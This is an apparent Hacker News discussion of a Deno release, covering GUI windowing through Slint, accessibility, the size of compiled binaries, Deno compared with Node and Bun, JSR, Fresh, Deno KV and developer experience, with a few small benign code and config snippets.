With Slint [1] we're working on a framework which allows you to make a desktop GUI in JavaScript/TypeScript without bringing in a browser/webview.
Currently, we do it by using native binaries through napi-rs so we can bring up a window using the platform's native API. And then we do some hacks to merge the event loops.
But if Deno supports bringing up a window directly, this means we could just ship wasm instead of native binaries for every platform. And I also hope the event loop integration would be simplified.
Although we'd also need more APIs than just showing a window (mouse and keyboard input, accessibility, popup windows, system tray, ...)
Big fan of custom rendering approaches, but wouldn't such a design system sidestep any and all accessibility tools? There'd be nothing for a screen reader to hook into. Text and interfaces would be neither native nor DOM-based.
Hypocritically 'a11y' isn't very accessible for those of us who don't use the jargon.
Also, the first thing the project website (https://www.a11yproject.com) has to do is explain what the '11' stands for. So they must have some awareness of how inaccessible their name is.
i18n has been around forever and makes sense, since the full word is a bit long in code. Then there's k8s, which never made sense to me. I don't know if it's appropriate to call it a trend, but I've seen people doing it more frequently.
The irony with this example is people with screen readers will hear something like “aEleveny” and it looks like “ally”.
People with screen readers are aware of acronyms even if they have poor vision, and it's unclear to me what the problem is; a11y has been around forever, and spelling it out in code is a bit long.
Reading again, is the trend you detest...abbreviations that have a number representing letter count? Based on the existence of k8s and a11y?
I'm just stating my opinion that I find these abbreviations annoying, yes. They are so unintuitive that unless someone explicitly calls out what they're abbreviating, you probably wouldn't pick up on it (e.g. the MDN page for Accessibility), and they just leave people confused (like me!). I suspect there's a reason AccessKit isn't named `a11yKit`.
Aren't a lot of abbreviations unintuitive until you learn what they mean?
Didn't we just have a thread the other day about the meaning of "MDN" - which also many people didn't know.
I see on this site "IMO" "FWIW" "IANAL" "TLDR" all the time. You generally can't tell what these mean either without looking them up or just knowing already because of them being so engrained in culture.
No, it's not the same; a11y creates a dissonance in the mind because part of it wants to see it as “ally”, another part wants to see it as “A eleven Y”, and another part cringes and thinks it's stupid.
This doesn't really seem related, it seems like you're saying "maybe we will use this, here is a link to our commercial GUI library".
Also, why would you want to make a GUI even more bloated by integrating a browser to get WebGPU and wasm (and why WebGPU instead of just WebGL)? That might be easy for library makers, but why would someone want a giant library to make a GUI when they already have Electron, if they don't care about 350MB binaries just to pop up a window?
What does it have to do with Deno and why do any of that to draw boxes and text on the screen? FLTK could do GUIs that took almost no CPU power starting with 100KB binaries 30 years ago.
People doing hardware accelerated GUIs have been using openGL for almost as long. This doesn't need to be a science project or a rabbit hole, drawing a GUI quickly is well worn territory.
FLTK and other libraries cannot be used from JavaScript.
JavaScript is one of the most popular programming languages. But a JavaScript dev who needs to make a desktop GUI will usually need to use Electron to bring up a browser for the GUI. This means actually running two JavaScript engines (Node's and Chromium's).
The reason it has to do with Deno is that you need a JavaScript/TypeScript runtime.
But you may not need a browser.
So you can develop your application in JavaScript using a framework that doesn't use the DOM but shows a native window instead.
This is more lightweight and more secure (no risks of HTML injection and the browser is a big attack vector)
FLTK is permanently stuck in the 90s. It doesn't have full unicode support, right-to-left & bidirectional text, and doesn't support accessibility tools.
Not to mention that development has been stagnant for 15 years, since its flagship application (Nuke) was ported to Qt.
Actually FLTK has full unicode support, right-to-left and bidi text.
The limiting factor is the OS.
For RTL and bidi, it depends on the OS. On Linux, for example, if FLTK is built with Pango support, it'll support them just fine. On Windows and macOS, these work out of the box.
As for accessibility, the only thing missing is screen reader support. Otherwise tab navigation, IME and other modalities are supported.
FLTK's bindings in Rust provide an accesskit adapter which supports screen readers using the accesskit crate.
Someone has to first write bindings to the library using said FFI. This is not something most JavaScript devs can do. It has to be written by someone who knows C++ and JavaScript, and is good at both, to understand all the details (how the two interact, how the lifetime of C++ objects plays with the garbage collector, how the event loops mix, ...).
Writing such bindings is a huge amount of work, as the whole API needs to be wrapped. And sometimes concepts from one language don't map easily onto the other (e.g. templates).
And then you still have to ship an extra binary in addition to Deno itself.
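For a sense of scale, here is roughly what the low-level side of such bindings looks like with Deno's FFI. The library path and the `add` symbol below are made up for illustration; a real GUI toolkit exposes hundreds of functions, plus callbacks and object lifetimes that don't map this neatly:

```ts
// Hypothetical shared library exporting a single C function:
//   int add(int a, int b);
const lib = Deno.dlopen("./libexample.so", {
  add: { parameters: ["i32", "i32"], result: "i32" },
});

console.log(lib.symbols.add(2, 3)); // 5
lib.close();

// Run with something like: deno run --allow-ffi --unstable-ffi main.ts
```

Every function, struct and callback needs a declaration like this, plus JavaScript-side wrappers to make the result feel idiomatic.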
Right, but that's still a far cry from being entirely unable to use them together. And as for the extra binary, that's hardly an obstacle if you already have to ship Deno itself anyway (and that ain't even considering the possibility of statically-linking it into a custom Deno binary).
edit: i will not be taking this comment in good faith, i had a look through parent comments and it looks like they simply do not agree with Slint's approach to GUI programming: https://news.ycombinator.com/item?id=39223499#39229382
> What does it have to do with Deno
can we at least try to give people the benefit of the doubt instead of pretending like everyone is out to get you? if you read the change-log, it spells it out well:
> Our goal is to provide a windowing solution for WebGPU without linking to native windowing systems like X11
> This is a low level API that can be used by FFI windowing libraries like sdl2, glfw, raylib, winit and more to create a WebGPU surface using native window and display handles.
do you get it yet?
> People doing hardware accelerated GUIs have been using openGL for almost as long. This doesn't need to be a science project or a rabbit hole, drawing a GUI quickly is well worn territory.
i suggest talking to other graphics professionals to get a better understanding of why opengl is not _the_ solution. for a tldr[0]:
> regular OpenGL on desktops had Problems. So the browser people eventually realized that if you wanted to ship an OpenGL compatibility layer on Windows, it was actually easier to write an OpenGL emulator in DirectX than it was to use OpenGL directly and have to negotiate the various incompatibilities between OpenGL implementations of different video card drivers. The browser people also realized that if slight compatibility differences between different OpenGL drivers was hell, slight incompatibility differences between four different browsers times three OSes times different graphics card drivers would be the worst thing ever. From what I can only assume was desperation, the most successful example I've ever seen of true cross-company open source collaboration emerged: ANGLE, a BSD-licensed OpenGL emulator originally written by Google but with honest-to-goodness contributions from both Firefox and Apple, which is used for WebGL support in literally every web browser.
it looks like they simply do not agree with Slint's approach to GUI programming
My comment here is explaining exactly why I don't agree, no digging required.
Your quote is also about browsers implementing the webGL API, it has nothing to do with using basic openGL for GUIs, which again, is not required, because CPUs have been rendering GUIs for decades.
They're working on a project called Dioxus Blitz; from what I'm told, they're trying to implement a minimal browser target, that provides some basic DOM-like features and renders with wgpu.
It's not exactly what you're hoping for, but you might find common ground.
I totally get the idea of bringing JS into new environments because it is so ubiquitous. On the other hand, I hate the language and wish we could replace it in the browser, the opposite direction. I'd be much happier with ClojureScript or PureScript or something being the standard with the ecosystem to go with it.
Typescript takes away a significant amount of the pain for me; the only hold up after that was getting an environment set up to compile it. Deno supporting typescript without any configuration is incredible.
TypeScript is mostly additive, so all the footguns are still there if you aren't careful to avoid them. It also doesn't do anything about the extremely meager standard library that is inferior to what other mainstream PLs had 20+ years ago.
Would love to see the compile situation fixed - the generated executables are ~90MB+ at this stage and do not allow compression without erroring out. Deploying à la Golang is not feasible at that level but could well be down the line if this dev branch is picked up again!
Hi, Bartek from the Deno team here. We are actively looking into improving this situation and from initial investigations we were able to shave off roughly 40% of the baseline size, with more improvements possible in the future. Stay tuned for upcoming releases.
Tuned I am, happy to hear this is getting attention. Improvements in this domain would also enable Deno to be a more serious contender in the App space opened up via https://github.com/webui-dev/deno-webui and others.
Currently the generated binary is not static anyway, so you still need some parts of the system installed to run code. To be more precise, you can't use a "from scratch" container image base, but need to use something that at the very least has libgcc installed, such as the distroless "cc" image (gcr.io/distroless/cc).
I'm not sure using deno compile as a way of deploying to a controlled environment has much benefit anyway. Unlike some other languages/runtimes, only a single system dependency is really needed (a new-enough deno installation) to run your code
In my view, deno compile is more about shipping command line tools to people with all sorts of personal environments (which may not have deno at all)
I've been really happy with using Deno as a general scripting runtime... A shebang at the top and external dependencies are loaded to a shared path on run.
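To make that concrete, here's a minimal sketch of such a one-off script (the std version pin and the URL fetched are purely illustrative):

```ts
#!/usr/bin/env -S deno run --allow-net
// Remote imports are fetched on first run and cached under DENO_DIR,
// a shared path, so there is no npm install step and no node_modules folder.
import { green } from "https://deno.land/std@0.214.0/fmt/colors.ts";

const res = await fetch("https://example.com");
console.log(green(`status: ${res.status}`));
```

Mark it executable (`chmod +x script.ts`) and it runs directly; the dependency cache is shared by every script on the machine.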
I do wish there was support for Linux distributions based on musl (Alpine) directly for smaller containers.
In general I like the Deno approach better than Node. Would be cool to see the UI tooling fleshed out. A Material or Fluent based component library where Deno can be used like Flutter would be very cool indeed.
I'm not sure what your requirements are, but I've had a good amount of success with converting Node.js libraries to native libraries by embedding a CommonJS module into the binary, then running the actual code through QuickJS. Much smaller binaries.
If you really are pressed for space, you could use upx, or store 7z compressed code and embed the 7z library to decompress before passing it along to QuickJS.
Like I said, I wasn't sure of their requirements. I can say QuickJS is orders of magnitude easier to embed and understand than V8, which is why I adopted it for my use case.
When I download a modern game it's like 700GB so I donno why people complain about 100mb self contained deploys for javascript. Most of it is the internationalization (Intl) libraries anyway.
I find it pretty ridiculous since I go to a website today and it's at least 15MB each time I refresh, but 100MB on the server is a problem? Dude, c'mon.
So the fact that everything around is poorly made, forbids him from whining that a certain solution is as bad as everything else? Shouldn't we criticize and point out stuff that is bad, no matter whether it's as bad as something else? It's because of attitude like yours that we get 15mb of javascript on every website, 500gb games and UIs that take seconds to load.
Well my point is that it isn't that bad and there's a reason for it being ~100mb. You can throw out the Intl stuff and remove a large portion of that for example.
Modern games aren't 700GB; there are a very few very large games. One of them is large on purpose to make you delete other games.
Updates for games are large because they aren't "just updated files", but a giant blob that can't be rearranged since it's optimized for loading order later.
Giant self-contained deploys like that are bad because their use case is CLI/GUI tools shipped to the end user. To give you context: my /usr/bin is ~900 binaries and total size is 109mb.
100MB at 1Gbps is ~0.8s to load. This especially sucks for FaaS and CI/CDs. This makes it difficult to use for on-demand use cases that are latency sensitive.
That and that's likely 100MB that's going to be competing for memory now* , in FaaS environments especially that's a ton of resources and you increase latency to load that especially over network storage. This also inflates container sizes and just becomes a pain in general.
*Server environments you often don't want to be using swap, and the OS will likely consider it high priority anyway.
I could only agree with you if you have a single monolithic server, don't use containers, don't need to distribute it to others, and don't frequently need to run a CI/CD pipeline. Only then are there not a ton of downsides to a 10mb vs 100mb executable.
> When I download a modern game it's like 700GB so I donno why people complain about 100mb self contained deploys for javascript.
People have been complaining about game sizes for years. "You complain about a 100GB game, I don't know why you also complain about a 100mb self-executable for a javascript runtime" doesn't really make sense.
Could be worse, could be Java. At least in terms of container size, cold start times and overhead at runtime. And I know there are options for AOT, etc. that are all more complex to configure than Deno build.
You download it to your game rig, not to some cloud solution with limited resources to be paid for. Plus you may want to have more than one instance of the service running.
I'm not using js, but that's not the point of the discussion.
And we were not talking about js, we were talking about Deno specifically. And notably about the binary growing year over year.
> Pretty much all cloud services offers way more than that for free
More than what? The question is always about the difference in %. The number of services/instances can grow faster than you can rewrite your code in Go/C++/Rust or whatever (not to mention you will have to hire people for the task). And all of a sudden this 3x-4x difference matters.
This is whataboutism. Different sizes are acceptable for different people based on context. I worry about 10s of kilobytes for things I work on for instance.
Yes, but there is a reason for it being 100MB. You get a self-contained app where you get to write in JavaScript. You don't have to spend 100x the time in order to get the same app working in Rust.
If size is such a big deal, then don't use Deno, Node or Bun.
My issue is that most people that are working in restricted environments would never touch javascript since it's not well suited for those kinds of environments. People that complain tend to be haters that just want something to hate upon.
It used to be about php, now it's about javascript.
Your argument seems to be that those 100 MB include the necessary libraries. The problem with this assertion is that much richer runtimes don't require that much. For example, a .NET Core console app published as self-contained is ~65 MB, and it comes with more libraries than Deno.
You don't - that's the size of a completely self-contained binary, with .NET effectively baked in. A "hello world" .NET app that uses external runtime would be measured in kilobytes.
There are size limits when deploying on serverless or edge infrastructure so developers have to care about that. The providers also typically charge by compute seconds * memory consumed so a larger executable costs real money as well.
Some serverless use cases work like you say, but Docker-based options such as AWS ECS, Docker-based Lambda functions, or Kubernetes would all commonly make use of compiled options
I'm not a big fan of JavaScript but I admit I stayed away from it because I dislike nodejs and npm terribly.
I was forced to start coding again in JS some weeks ago and I wanted to try Deno. I must say it's been a very smooth and fast experience so far.
Very well done!
Can you comment on what you prefer about it? I find npm/js pretty smooth and the rough edges of Deno seem to kill the purported improvements at this point. That was just my gut-take several months ago and I was already steeped in the node/npm ecosystem so I'm curious about your perspective.
No Byzantine build config files, for a start. Dependencies are downloaded on demand to a shared location outside your project instead of a separate npm install step.
TypeScript and esm/cjs usage without crazy syntax (writing modules, consuming cjs at least).
Linting and formatting in the box.
Can do shell scripts without package.json and npm install, just a shebang line at the top.
It's not the JavaScript runtime that's faster but the built-in APIs. Supposedly (I haven't tested this myself), Deno has faster implementations of many Node.js APIs, which I have seen reflected in benchmarks for things like throughput in an HTTP server.
Same with bun, it looks like node is leaving some performance on the table (maybe for backward compatibility or maybe because nobody bothered to improve it)
A ton of NodeJS modules are not part of V8 at all, like "fs" or "path" because those don't really make sense in a browser context. Basically everything that is not a W3C standard is probably not implemented in V8.
Like, for example, I recently found out that there are 3 separate ReadableStream objects in NodeJS: one from "stream" (the older one, used in Request), one from "stream/web" (the W3C standard, used by global.fetch()) and another one I forgot where it comes from. It doesn't help that two of them have the same name and you run into errors like "ReadableStream is not of type ReadableStream".
I assume the one from "stream/web" directly calls into V8 APIs because since it is a standard it would be implemented in V8 (it is used in the browser's window.fetch() after all). While the one from "stream" is built and maintained by NodeJS Foundation.
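To make the stream mismatch concrete, here's a small sketch of bridging the two flavours in Node (the values are illustrative; `Readable.toWeb`/`fromWeb` have been around since roughly Node 17):

```ts
import { Readable } from "node:stream"; // the classic Node stream type

// A classic Node Readable, the kind older APIs hand you.
const nodeStream = Readable.from(["hello", " ", "world"]);

// Bridge to the WHATWG/web ReadableStream that fetch()/Response expect.
const webStream = Readable.toWeb(nodeStream);

// ...and back again, for libraries that insist on the Node flavour.
const roundTripped = Readable.fromWeb(webStream);
console.log(roundTripped instanceof Readable); // true
```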
It is not really reasonable to expect the NodeJS Foundation to have enough resources to optimise all these modules to the max. And the W3C doesn't seem interested in building standards for server-side only things.
To add to this, a lot of those "W3C APIs" (most?) (to which I'll also add WHATWG APIs, like HTML5 - or fetch) actually have no relation to ECMAScript and thus aren't generally in V8, because they are not JavaScript.
Those APIs can be thought of as coming from the "environment" in which JavaScript runs. For example, we often call web-only APIs "DOM APIs": `fetch`, `XMLHttpRequest` and so on.
Node.js also has its own environment. For example both `setTimeout` and `setInterval`, though present in both web and node.js, are implemented differently by browsers and node.js (it's just that node.js decided to go with roughly the same API - see below for code examples for both).
Taking requests as an example, they are both declared in Blink (the rendering engine) and not in V8, again because they aren't JS:
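Picking up the setTimeout example above, here is a rough TypeScript sketch of "same API, different implementation": even the return type differs between the two environments:

```ts
// In a browser (lib.dom.d.ts), setTimeout returns a plain number.
// In Node.js (node:timers), it returns a Timeout object with extra methods
// such as unref(), which lets the process exit while the timer is pending.
const t: ReturnType<typeof setTimeout> = setTimeout(() => console.log("tick"), 1000);

if (typeof (t as any).unref === "function") {
  (t as any).unref(); // Node-only; a browser's numeric id has no such method
}

clearTimeout(t);
```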
Good points, I always wondered why it took so long for NodeJS to support fetch() and WebSockets and other standard APIs. I thought those were part of V8, but I guess not!
NPM used to be reaaaaaallly bad due to lack of lockfiles and how it used to handle diamond dependencies
Add to that the propensity of JS projects to have a ton of deps...
It has mostly been sorted out by all package managers. The node_modules debacle is still a hotly contested topic, it creates a lot of problems, but it also solves a lot of them compared to alternative approaches.
Then you have install performance which is mostly fine by now in all package managers, but if you really have problems with it you can use pnpm or yarn2.
As the Python ecosystem grows and dependency trees move away from "Django only", you can see it running into the same types of problems that JS used to have.
We use TypeScript for virtually everything at my place of work. Not so much because it's a great language for a lot of the backend (we do use some C++ for bottlenecks), but because it's so much more productive to use a single language when you're a small team. Not only can everyone help each other, we can also share resources between the front end and the back end, and we have several in-house libraries to help us with things like OData querying and APIs, since there aren't really any public packages that are in any way useful for that. I guess we probably should've gone with something other than OData, but since we use a lot of Microsoft Graph APIs, which despite the name are OData, it made sense at the time.

We don't have trouble with Node or NPM, and when we onboard new people, they tend to step right into our setup and like it. Granted, we've done some pretty extensive and very opinionated skeleton projects that you have to use if you want to pass the first steps in our deployment pipeline. This took a little bit of effort, and it's still a team effort to keep our governance up to something we all agree on, but with those in place, I've found it's genuinely a nice way to work. An example of how strict we are is that you can't have your functions approved without return types, and you certainly can't change any of the linting or TypeScript configs. Similarly, you can't import third-party NPM packages which aren't vetted first, and we have no auto-update on third-party packages without a two-week grace period and four sets of human eyes. I'm not going to pretend that all of these choices are in any way universal, but it's what we've come together and decided works for us.
Anyway, you're certainly not alone in your opinion, but I think that a lot of the bad reputation with Node and NPM comes from the amount of "change management" you need to do to "limit" the vast amount of freedom the tools give you into something that will be workable for your team. Once you get there, however, I've found it to be much nicer to work with than things like NuGet and dotnet, requirements.txt and Python, Cargo and Rust, and a lot of others. I do have a personal preference for yarn, but I guess that's mostly for nostalgic reasons. I also very much appreciate that things like PyPI are going down something similar to the NPM route.
I deployed my first non-trivial Deno app to production in 2023. There were some teething issues with learning to keep the lock file in sync, especially in a repo with multiple entry points each with separate lock files. Some of the granular permissions stuff didn't work how I expected, to the point where I almost gave up and just allowed network to/from all hosts. But overall the experience was good, and I have positive feelings towards Deno. I look forward to seeing where they take it.
Why Choose JSR?
A True TypeScript-First Environment: Efficient type checking and no transpilation hassles—write in TypeScript and deploy directly.
Performance and Usability at the Forefront: With integrated workspaces and seamless NPM integration, JSR puts usability first.
Secured and Accessible Modules: All modules in JSR are exposed over HTTPS, ensuring your code is always secure.
Open Source, Community-Driven: Built by developers, for developers, JSR is shaped by the real-world needs and contributions of the JavaScript community.
But they promoted the idea that they would never need one, to the extent that they would never build one. There was only deno.land as a place to discover libraries and what the community builds.
"Jupyter, the open source notebook tool, added support for JavaScript and TypeScript using Deno. This means data science, visualization, and more can all be done using modern JavaScript and TypeScript and web standards APIs."
I love this! At the same time, who would want to do this, given Python's excellent support for numbers and mathematics? And what about Haskell?
The people who already know JS/TS and would like to occasionally do something interesting with a piece of data.
With Python, most of my time goes into googling how that list filtering / mapping syntax went again or some other basic level stuff that I do every day with JS. I know Python, but I'm not fluent in it. And I will likely never be fluent in it, because my Python use cases are so infrequent.
Maybe you want to share examples of how to do things in TypeScript using a notebook? Although, Observable [1] is another way to do that, for JavaScript at least.
Deno is such a great project. I would love to see greater support for embedding it into a Rust host process.
I'm writing a JavaScript bundler and need a Node.js runtime to execute plugins. Deno's executable has fantastic Node support (at least, good enough for my use case) however the deno-core crate is super barebones and difficult to embed.
At this stage I can't simply add the deno runtime into my Rust application, I need to copy/paste internal crates from the Deno executable and wire them up myself (without documentation on how).
I'd love to see expansion for my use case - Deno could become the "plugin runtime" for the JS tooling world if it had a nice embed story.
Right now I am just going with a Nodejs child process that I talk to from the Rust host process using stdio. In my tests, the stdio approach has 10x the communication latency when compared to an embedded Deno runtime (that adds ~1 second per round trip message in a project with 100k assets)
They’re operating like a startup, which like you say should be perfectly fine. Can’t pretend like a giant when you don’t have the bank account for that.
Though they’re also selling a developer ecosystem. A lock-in. Are you willing to bet your company’s own software tools on a vendor that could go bankrupt from their other (hosting) business? The question is if Deno hosting dies, will Deno as a platform still thrive?
I think by now accusations of lock-in are a bit shaky. They're providing self-hosted alternatives for all the features of their ecosystem (and it's all open-source anyway).
If anyone from Supabase is reading here, your main marketing page still says Edge Functions run on 29 regions. Since they run off of Deno Deploy, it seems like this needs updating.
thanks - will update. It is actually hosted on our own side but I don’t think we are in 29 regions and clearly forgot to update this when we migrated. I’ll figure out the exact number and create a PR
I'd love to use Fresh but a framework for web development which calls itself v1.x and yet only supports Tailwind for styling purposes feels very immature.
The fact that for the next iteration they are prioritizing view transitions and not CSS bundling is baffling.
If I want to use any modern styling solution (CSS modules, Vanilla Extract, Panda, any CSS-in-JS...), a bit of cooperation from the bundler is needed. I can generate CSS file(s) in any way I like, but I would have zero integration with the templates.
All CSS-in-JS or styling solutions that allow for component scoping require some kind of bundling or other interaction with the bundler. It's true most people don't need it, but most people don't need 90% of what Fresh offers, surely?
Deno wasn't originally designed to be node compatible, but I think they realized nobody would want to switch to it because node is so prevalent already...
I think the main appeal of projects like Bun and Deno is the built-in tooling for building/bundling modern typescript applications without requiring dozens of dependencies for even a basic hello world app.
If node.js decided to include functionality similar to what is available on Bun/Deno, both projects would probably lose traction quickly.
that feels like a really weak value prop to me. how often do you have to install that stuff? how hard is it actually? can you really not use, e.g. for react, the typical vite starter and it's done?
The other side of it is if you want to distribute your code not as a server. If you write a CLI in Node + TS + ... then it might be pretty fiddly for someone to clone that repo and get it running locally. You'll certainly have to document exactly what's needed.
Whereas with Deno you can compile to a single binary and let them install that if they trust you. Or they can `deno install https://raw.githubusercontent.com/.../cli.ts`, or clone the repo and just run `deno task install` or `deno task run`. For those they need to install Deno, but nothing else.
> then it might be pretty fiddly for someone to clone that repo and get it running locally
with node + TS, it is straightforward (and common) to generate JS output at publish time for distribution. then, using the CLI tool or whatever is only a `npm install -g <pkg>` away, no extra steps.
sure it's not a single binary, but I'd argue _most_ users of a general CLI utility don't necessarily care about this.
So Deno is better at small scripts written in Typescript than Node. Then, the question becomes, if you're going to have Deno installed and if it works well enough to replace Node, why keep Node?
then you have to define "works well enough to replace Node"
i was excited about bun too, until v1's "drop-in node replacement"
that was in no way a drop-in node replacement. using that would be the fastest way to kill a business with its terrible bugs and rough edges.
i used to be really excited about deno, but now i think the tradeoffs aren't going to be worth it for mass adoption. i sometimes write servers in go. now that i have go installed, should i use it for all my servers? no, it's just another tool with different trade-offs. most times, node will suit my project better.
> can you really not use, e.g. for react, the typical vite starter and it's done?
I have to install that stuff every time I'm starting a new project, switching to a new project, or creating a one-off script.
It's hard when creating a new project, because there's always at least one flag that needs to be found and set differently from a previous project for some random reason, every single time.
It's hard when switching to a new project, because you have to figure out which version of node you're supposed to be running, since dependencies behave differently across node versions and across computers. It might even silently work for you without being on the right version, meaning you continue working on it, and then your commits don't work for yourself later, or for others now or later. This leads to one of two possibilities:
1. A long job of unwinding everything to figure out what the versions should have been the whole time.
2. A lot of trial and error with version numbers in the package and lock files trying to figure out which set of dependencies work for you, work for others, and don't break the current project.
We also can't use the typical community templates because they always become unmaintained after 2 years or so.
---------------------------
Why I like Deno:
- Stupid easy installation (single binary) with included updater
- Secure by default
- TS out of the box (including in the REPL, making one-off scripts super easy to get started)
- Settings are already correct by default.
-- and if you ever need to touch settings for massive projects, they all sit in one file, so no more: tsconfig/package.json/package-lock/yarnlock/prettier/babel/eslintrc/webpack/etc... And since the settings are already sensible by default, you only need to provide overrides, not the entire files, so the end result for a complex project is usually small (example link: https://docs.deno.com/runtime/manual/getting_started/configu... - see also the config sketch after this list)
- Comes with a built-in std library, meaning I don't need to mess around with dependencies
- Built-in utilities are actually good, so I don't need to mess around with the rest of the ecosystem: no jest/vitest, no webpack/rollup, no eslint/prettier/biome (but you can keep using your editor versions just fine).
- Since it came after the require -> import transition, basically everything you're going to be doing is already using the more sensible es modules.
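A minimal sketch of what such a single config file can look like (the task, import mapping and options below are illustrative, not a recommendation):

```jsonc
// deno.json
{
  "tasks": {
    "dev": "deno run --watch --allow-net main.ts"
  },
  "imports": {
    "@std/assert": "https://deno.land/std@0.214.0/assert/mod.ts"
  },
  "compilerOptions": {
    "strict": true
  },
  "fmt": {
    "lineWidth": 100
  },
  "lint": {
    "rules": { "tags": ["recommended"] }
  }
}
```

Everything not listed falls back to Deno's defaults.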
Except they are playing catch up with what Microsoft says Typescript is supposed to mean.
I'd rather have pure JavaScript, or use TypeScript from source, without having to figure out whether a type analysis bug is from me or from the tool that is catching up to the latest TypeScript.
Not sure what modern typescript means, but you only need one or two dependencies (esbuild and tsc) unless you are doing something more involved, in which case deno alone might not work either.
OTOH the ways that you can improve upon node's shortcomings while staying compatible with it are limited. Bun is taking the pragmatic approach of providing fast drop-in replacements for node, npm and other standard tools, while Deno was the original creator of node going "if I started node today, what would I do differently?". So, different approaches...
I’ve used Jupyter notebooks with deno decently. They seem much better than Python Jupyter notebooks because of the lack of pain around dependency management.
I deployed 3 projects on Deno last year and I'm planning on launching 2 websites in the next couple of months. Mix of personal projects and some for clients.
Deno Deploy just works, though the cold start can be slow; I'm now using a hybrid setup with Fresh routes backed by a CDN.
The dev experience is great. I've used a couple of similar solutions (Next, Nuxt and vite-ssr-plugin) and sometimes I need to do some things manually that would already exist on other platforms, but in the end my projects stay simpler.
Deno has also created a Next.js competitor, Fresh. I found it a few weeks ago and am starting to go through the docs, looks like a good overall concept. https://fresh.deno.dev/
I actually found this worrying, since it means they are not committed to making NextJS work nicely; quite the opposite, they now have an incentive to not make it happen.
Even if Vercel was built on Deno, I don't see them open sourcing that. Everything that manages distributed cache, edge rendering... They'd probably rather keep that closed and available only for Vercel customers.
The NextJS team should be working on making NextJS run better with Deno, not the other way around. If the NextJS team doesn't want to do the heavy lifting with that support, that's on them. I think it's perfectly reasonable that the Deno folks have an approximate alternative to NextJS. After all, NextJS won't use native Deno idioms, for example; it'll always be tied to Vercel's proprietary cloud infrastructure.
Deno has members in Ecma TC39, so they take part in the development and standardization of JS.
Deno brings a new mentality to development focused on simplifying things, whereas Bun aims to be an improved Node.
Deno aligns with web APIs: you can use the same APIs in the browser and in Deno. Many packages work in both platforms. Deno is even in the compatibility tables in MDN.
Deno simplifies DX greatly. It's very easy to work with Deno. Easy to install things and set up a project, easy to deploy, no config files etc.
Deno is written in Rust, which allows them to move faster and more safely. Contributing to and extending Deno is a breeze. You can add Rust crates to the runtime and use them from JS.
I feel like the Bun team has been too pressured by executives and marketing. They announced 1.0 when Bun was clearly not stable enough, giving lots of segfaults. Even their readme had a huge statement right in the beginning saying that Bun was not production ready yet, despite 1.0 being hyped all over the place.
> Deno is written in Rust, which allows them to move faster and more safely. Contributing to and extending Deno is a breeze. You can add Rust crates to the runtime and use them from JS.
Pick your horse to bet on. They both have great teams behind them. Bun (written in Zig) claims higher performance. It looks promising but independent tests have yet to validate these claims.
They also kinda have different goals. Bun seeks to be more of a drop-in replacement from Node whereas Deno, being spearheaded by the same person who made Node, seeks to move the industry forward and fix mistakes Deno made. However Deno, out of necessity, has also highly valued backwards compatibility with the Node ecosystem
It's a weird scenario. You have node which is entrenched, feature-rich, and stable although not perfect. Then you have two runtimes/ecosystems trying to optimize on that but in slightly different ways. I love it but I feel like there is barely room for even one. It's just incredible there is so much work being put forth into moving the needle maybe an extra 20% on the existing node/npm status quo.
> Deno, being spearheaded by the same person who made Node, seeks to move the industry forward and fix mistakes Deno (I assume you mean Node.js) made.
If they aren't able to evolve Node.js to overcome the mistakes (e.g. because they're technical in nature, or momentum of install base, or they don't have the leadership ability), I am worried that they might repeat the same pattern with Deno, since it isn't possible to NOT make any mistakes.
OTOH, having a clean slate that's learned from mistakes and you can bring a lot of your code along doesn't seem like a major impediment.
Is code written for any of the 3 runtimes generally transferrable? I realize some won't (e.g. Deno has WebGPU support, which is attractive to me), but generally?
The main difference is that Deno was thought to evolve hand in hand with browsers since the beginning. Node followed its own way and fragmented the JS ecosystem. It got to a point where it was basically impossible to realign Node's direction without breaking everyone's codebase. Mistakes will be made in Deno, but the direction of the project now takes into account the ecosystem as a whole.
I still haven't figured out how to bring in a deno "app", a cli tool, into an air-gapped environment. There is literally zero docs and everything assumes you are connected to the internet. The whole thing is too magical, and has no hope in the corporate world.
It is interesting to me that none of the new NodeJS alternatives support multithreading. Why is that?
Is it just a side-effect of using V8 engine for the heavy lifting, or is it some part of the ECMAScript specification which forbids multithreaded implementations of the language?
Cons: All your async code becomes full of data races.
I suppose adding multithreading to the Node ecosystem would be as hard (if not harder) than removing GIL from Python. At least Python has locking primitives. Node, as far as I know, has none.
Haven't deployed it yet, but the API seems decent when doing local development.
It's a bit low-level compared to a SQL database; you're building your own indexes and need to write transactions to update them atomically along with the main record. (But it does have transactions, so it's reasonable.) It reminds me of App Engine datastore, back in the day.
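A minimal sketch of that pattern, assuming illustrative key names (Deno KV needed the --unstable-kv flag at the time):

```ts
const kv = await Deno.openKv();

interface User { id: string; email: string; name: string }
const user: User = { id: "u1", email: "ada@example.com", name: "Ada" };

// Write the main record and a secondary index entry in one atomic commit,
// so the hand-rolled index can never drift from the record.
const res = await kv.atomic()
  .check({ key: ["user", user.id], versionstamp: null }) // only if it doesn't exist yet
  .set(["user", user.id], user)                          // main record
  .set(["user_by_email", user.email], user.id)           // index: email -> id
  .commit();
if (!res.ok) console.error("user already exists");

// Lookup goes through the index first, then fetches the record.
const idEntry = await kv.get<string>(["user_by_email", "ada@example.com"]);
if (idEntry.value) {
  const found = await kv.get<User>(["user", idEntry.value]);
  console.log(found.value?.name);
}
```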
There are some fairly tight limits. (64 KiB per value.) I wouldn't use it for storing images or larger files.
Not sure what I'm going to do for full-text search. But I've built simple search engines from scratch before.
I know it sounds silly but I love the aesthetic behind Deno's brand; it makes me want to use it for one project or another. Node.js is so old now. It's reliable but boring. I want something new, bold, and daring. Node.js is not it, although it was ~11 years ago. It's interesting how our views change.
This does indeed sound silly. If people were to use proper arguments to select technology, we wouldn't be in this mess in the first place. Unfortunately, most of us are more susceptible towards aesthetics, novelty, and admiration of self-proclaimed software gurus. Thanks for being open about this and sharing.
It would have been nice if I had realized this aspect of technological evolution earlier in my career. I might have spent more time learning about marketing than about the actual technology.
Yeah.. It's become a cliché that web developers, especially in the JavaScript ecosystem, are always chasing after what's "new and shiny". This leads to constant churn, new frameworks and libraries that reinvent the wheel, endless stuff to learn and catch up. It gets tiring after a while.
So the old-timers remind us, "Choose boring technology." Reliable and boring is a good thing.
On the other hand, I recently started learning Bun, and oh what a breath of fresh air, it makes things fun again. I love that its codebase is so readable and small still, and everything is freshly designed with the insights of experience and hindsight. It doesn't have the accumulated cruft, years of decisions and compromises.
So, sometimes it's great to shed the old and grow with the new generation.
I like it too. I even liked the old website better than the current one. It was more colorful and fancy.
Brand reflects a project's philosophy. Deno is meant to be easy and simple, and the "childish" branding reflects that.
